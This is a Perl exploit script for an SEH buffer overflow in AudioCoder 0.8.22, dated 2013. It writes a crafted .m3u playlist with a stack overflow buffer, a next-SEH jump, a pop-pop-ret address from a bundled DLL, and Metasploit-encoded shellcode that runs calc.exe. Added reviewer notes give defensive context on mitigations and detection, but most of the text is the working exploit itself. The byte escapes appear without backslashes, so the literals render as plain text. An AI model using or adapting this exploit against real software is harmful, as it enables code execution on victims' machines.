
AudioCoder 0.8.22 SEH Buffer Overflow

Posted on 01 November 2013

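#!/usr/bin/perl
###############################################################################
# Exploit Title: AudioCoder 0.8.22 (.m3u) - SEH Buffer Overflow
# Date: 10-18-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: AudioCoder 0.8.22 (http://www.mediacoderhq.com/audio/)
# Software Link: http://www.fosshub.com/download/AudioCoder-0.8.22.5506.exe
# Version: 0.8.22.5506
# Tested On: Windows XP SP3
# Creates an .m3u file to exploit a very basic seh bof:
# junk --> next seh (jmp to shellcode) --> seh (pop3 pop ret) --> shellcode
###############################################################################
#
# Reviewer notes (defensive context):
#   * What the script produces: one playlist file, audiocoder.m3u, holding a
#     single entry that begins with "http://" and is padded to $buffsize
#     characters. The author's header describes the parser copying that entry
#     past a stack buffer until it overwrites a structured-exception-handler
#     record.
#   * Why it worked on the tested system: the handler pointer is taken from a
#     DLL bundled with the application (see the $seh comment). That presumably
#     means the module was loaded at a fixed address and was not covered by
#     SafeSEH on the author's Windows XP SP3 target -- confirm against the
#     actual binaries before relying on this.
#   * Mitigation: the root cause is an unbounded copy of a playlist entry, so
#     the real fix is a length check in the parser. Build-level hardening
#     (/SAFESEH, /DYNAMICBASE, /NXCOMPAT) and OS-level SEHOP make this class of
#     handler overwrite much harder to use.
#   * Detection: a .m3u whose URL line runs to thousands of characters is not a
#     normal playlist. The payload comment below names calc.exe as the command,
#     so a media application spawning an unrelated child process is the
#     behavioural signal to alert on.
#   * NOTE(review): byte values in the string literals are shown exactly as
#     this page renders them (plain text) and are not reinterpreted here, so
#     the length arithmetic below reflects the literal text.
use strict;
use warnings;

my $buffsize = 5000; # sets buffer size for consistent sized payload
my $junk = "http://" . ("x90" x 757); # offset to seh overwrite
my $nseh = "xebx14x90x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack('V',0x6601228e); #overwrite seh w/ pop edi pop ebp ret from AudioCoderlibiconv-2.dll
my $nops = "x90" x 20;

# Calc.exe payload [size 227]
# msfpayload windows/exec CMD=calc.exe R |
# msfencode -e x86/shikata_ga_nai -c 1 -b 'x00x0ax0dxff'
my $shell =
"xdbxcfxb8x27x17x16x1fxd9x74x24xf4x5fx2bxc9" .
"xb1x33x31x47x17x83xefxfcx03x60x04xf4xeax92" .
"xc2x71x14x6ax13xe2x9cx8fx22x30xfaxc4x17x84" .
"x88x88x9bx6fxdcx38x2fx1dxc9x4fx98xa8x2fx7e" .
"x19x1dxf0x2cxd9x3fx8cx2ex0exe0xadxe1x43xe1" .
"xeax1fxabxb3xa3x54x1ex24xc7x28xa3x45x07x27" .
"x9bx3dx22xf7x68xf4x2dx27xc0x83x66xdfx6axcb" .
"x56xdexbfx0fxaaxa9xb4xe4x58x28x1dx35xa0x1b" .
"x61x9ax9fx94x6cxe2xd8x12x8fx91x12x61x32xa2" .
"xe0x18xe8x27xf5xbax7bx9fxddx3bxafx46x95x37" .
"x04x0cxf1x5bx9bxc1x89x67x10xe4x5dxeex62xc3" .
"x79xabx31x6axdbx11x97x93x3bxfdx48x36x37xef" .
"x9dx40x1ax65x63xc0x20xc0x63xdax2ax62x0cxeb" .
"xa1xedx4bxf4x63x4axa3xbex2exfax2cx67xbbxbf" .
"x30x98x11x83x4cx1bx90x7bxabx03xd1x7exf7x83" .
"x09xf2x68x66x2exa1x89xa3x4dx24x1ax2fxbcxc3" .
"x9axcaxc0";

# fill remainder of buffer with junk chars; not necessary but useful
# to check remaining usable space for different sized payloads
my $fill = "x43" x ($buffsize - (length($junk)+length($nseh)+length($seh)+length($nops)+length($shell))); # fills remainder of buffer
my $buffer = $junk.$nseh.$seh.$nops.$shell.$fill;

# write the exploit buffer to file
# Three-arg open with a lexical handle: the original two-arg form
# (open(FILE, ">$file")) lets characters in the filename change the open mode
# and ignored every I/O failure, so a failed write still reported success.
my $file = "audiocoder.m3u";
open(my $out, '>', $file) or die "Cannot open $file for writing: $!";
print {$out} $buffer or die "Cannot write to $file: $!";
close($out) or die "Cannot close $file: $!";
print "Exploit file created [" . $file . "] ";
print "Buffer size: " . length($buffer) . " ";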

 
